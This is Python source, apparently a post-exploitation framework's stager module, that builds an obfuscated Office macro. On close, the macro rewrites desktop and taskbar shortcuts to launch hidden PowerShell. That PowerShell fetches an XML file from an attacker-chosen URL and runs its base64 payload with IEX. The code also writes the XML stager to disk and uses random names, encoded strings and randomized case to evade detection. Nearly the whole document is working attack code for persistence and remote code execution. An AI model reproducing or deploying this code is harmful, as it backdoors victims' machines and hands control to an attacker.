	    macro += "lnk.IconLocation = \"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\"\n"
	    macro += "lnk.save\n"


# second shortcut: the pinned-taskbar "Internet Explorer.lnk", same target and arguments
	    macro += "Set lnk = myWS.CreateShortcut(Environ(\"AppData\") & \"\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk\")\n"
	    macro += "lnk.targetpath = \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe \"\n"
	    macro += "lnk.arguments = \"-w hidden -nop -enc " + encLaunch + "\"\n"
	    macro += "lnk.IconLocation = \"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\"\n"
	    macro += "lnk.save\n"
	    macro += "End Function\n"

# write the XML document to disk on the operator side; the file handle is
# never closed in this method

	    f = open(XmlOut,"w")
	    f.write("<?xml version=\"1.0\"?>\n")
	    f.write("<command>\n")
	    f.write("\t<a>\n")
	    f.write("\t<execute>"+launcher+"</execute>\n")
	    f.write("\t</a>\n")
	    f.write("</command>\n")

            return macro
    def generate(self):

        # setting variables
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
        targetEXE = self.options['TargetEXEs']['Value']
        XmlPath = self.options['XmlUrl']['Value']
        XmlOut = self.options['XmlOutFile']['Value']
        targetEXE = targetEXE.split(',')
        targetEXE = filter(None, targetEXE)

        fncDecryptName = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 15)))
        shellVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        lnkVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        fsoVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        folderVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        fileVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        encStrVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        tempStrVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        shiftVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        offsetVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))
        blockVar = ''.join(
            random.sample(string.ascii_uppercase + string.ascii_lowercase,
                          random.randint(10, 25)))

        # generate the launcher
        launcher = self.mainMenu.stagers.generate_launcher(
            listenerName,
            language=language,
            encode=True,
            userAgent=userAgent,
            proxy=proxy,
            proxyCreds=proxyCreds,
            stagerRetries=stagerRetries)
        launcher = launcher.split(" ")[-1]

        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            #build out the macro - will look for all .lnk files on the desktop, any that it finds it will inspect to determine whether it matches any of the target exe names
            macro = "Sub Auto_Close()\n"
            #macro += "Dim " + shellVar + " As Object, " + lnkVar + " as Object, " + blockVar + " as String\n"
            macro += "Set " + shellVar + " = CreateObject(" + fncDecryptName + "(\"" + self.encoder(
                "Wscript.Shell") + "\"))\n"
            macro += "Set " + fsoVar + " = CreateObject(" + fncDecryptName + "(\"" + self.encoder(
                "Scripting.FileSystemObject") + "\"))\n"
            macro += "Set " + folderVar + " = " + fsoVar + ".GetFolder(" + shellVar + ".SpecialFolders(\"desktop\"))\n"
            macro += "For Each " + fileVar + " In " + folderVar + ".Files\n"
            macro += "If(InStr(Lcase(" + fileVar + "), \".lnk\")) Then\n"
            macro += "Set " + lnkVar + " = " + shellVar + ".CreateShortcut(" + shellVar + ".SPecialFolders(\"desktop\") & \"\\\" & " + fileVar + ".name)\n"
            macro += "If("
            for i, item in enumerate(targetEXE):
                if i:
                    macro += (' or ')
                macro += "InStr(Lcase(" + lnkVar + ".targetPath), " + fncDecryptName + "(\"" + self.encoder(
                    targetEXE[i].strip().lower() + ".") + "\"))"
            macro += ") Then\n"

            #writing out and obfuscating the command that will be executed upon clicking the backdoored .lnk
            launchString1 = " -w hidden -nop -command \"[System.Diagnostics.Process]::Start(\'"
            launchString2 = "& " + lnkVar + ".targetPath & "
            launchString3 = "\');$u=New-Object -comObject wscript.shell;Get-ChildItem -Path $env:USERPROFILE\desktop -Filter *.lnk | foreach { $lnk = $u.createShortcut($_.FullName); if($lnk.arguments -like \'*xml.xmldocument*\') {$start = $lnk.arguments.IndexOf(\'\'\'\') + 1; $result = $lnk.arguments.Substring($start, $lnk.arguments.IndexOf(\'\'\'\', $start) - $start );$lnk.targetPath = $result; $lnk.Arguments = \'\'; $lnk.Save()}};$b = New-Object System.Xml.XmlDocument;$b.Load(\'"

            launchString4 = "\');[Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String($b.command.a.execute))|IEX\""
            launchString1 = helpers.randomize_capitalization(launchString1)
            launchString2 = helpers.randomize_capitalization(launchString2)
            launchString3 = helpers.randomize_capitalization(launchString3)
            launchString4 = helpers.randomize_capitalization(launchString4)

            #the encoded script gets long, this snippet chunks data to a more manageable size, keeps vbscript from erroring out due to a line over 1023 chars
            chunks = list(
                helpers.chunks(
                    self.encoder(launchString3 + XmlPath + launchString4),
                    random.randint(600, 750)))
            macro += blockVar + " = \"" + str(chunks[0]) + "\"\n"
            for chunk in chunks[1:]:
                macro += blockVar + " = " + blockVar + " + \"" + str(
                    chunk) + "\"\n"

#part of the macro that actually modifies the LNK files on the desktop, sets iconlocation for updated lnk to the old targetpath, args to our launch code, and target to powershell so we can do a direct call to it
            macro += lnkVar + ".IconLocation = " + lnkVar + ".targetpath\n"
            launchString = fncDecryptName + "(\"" + self.encoder(
                launchString1
            ) + "\")" + launchString2 + fncDecryptName + "(" + blockVar + ")\n"
            macro += lnkVar + ".arguments = " + launchString
            macro += lnkVar + ".targetpath = left(CurDir, InStr(CurDir, \":\")-1) & " + fncDecryptName + "(\"" + self.encoder(
                ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
            ) + "\")\n"
            macro += lnkVar + ".save\n"
            macro += "end if\n"
            macro += "end if\n"
            macro += "next " + fileVar + "\n"
            macro += "End Sub\n\n"

            #de-obfuscation function written into macro, this is called at the macro's runtime and converts obfuscated text back to ascii
            macro += "Function " + fncDecryptName + "(" + encStrVar + ") as String\n"
            macro += "Dim " + tempStrVar + ", " + shiftVar + ", " + offsetVar + "\n"
            macro += shiftVar + " = CLng(\"&H\" & Left(" + encStrVar + ", 1))\n"
            macro += offsetVar + " = CLng(\"&H\" & Mid(" + encStrVar + ", 2, 2)) + 4\n"
            macro += "For i = " + offsetVar + " To Len(" + encStrVar + ") Step 3\n"
            macro += tempStrVar + " = " + tempStrVar + " & Chr(CLng(\"&H\" & Mid(" + encStrVar + ",i,2)) + " + shiftVar + ")\n"
            macro += "Next\n"
            macro += fncDecryptName + " = " + tempStrVar + "\n"
            macro += "End Function"

            #writes XML intermediate stager to disk
            print("Writing xml...\n")
            f = open(XmlOut, "w")
            f.write("<?xml version=\"1.0\"?>\n")
            f.write("<command>\n")
            f.write("\t<a>\n")
            f.write("\t<execute>" + launcher + "</execute>\n")
            f.write("\t</a>\n")
            f.write("</command>\n")
            print(
                "xml written to " + XmlOut +
                " please remember this file must be accessible by the target at this url: "
                + XmlPath + "\n")

            return macro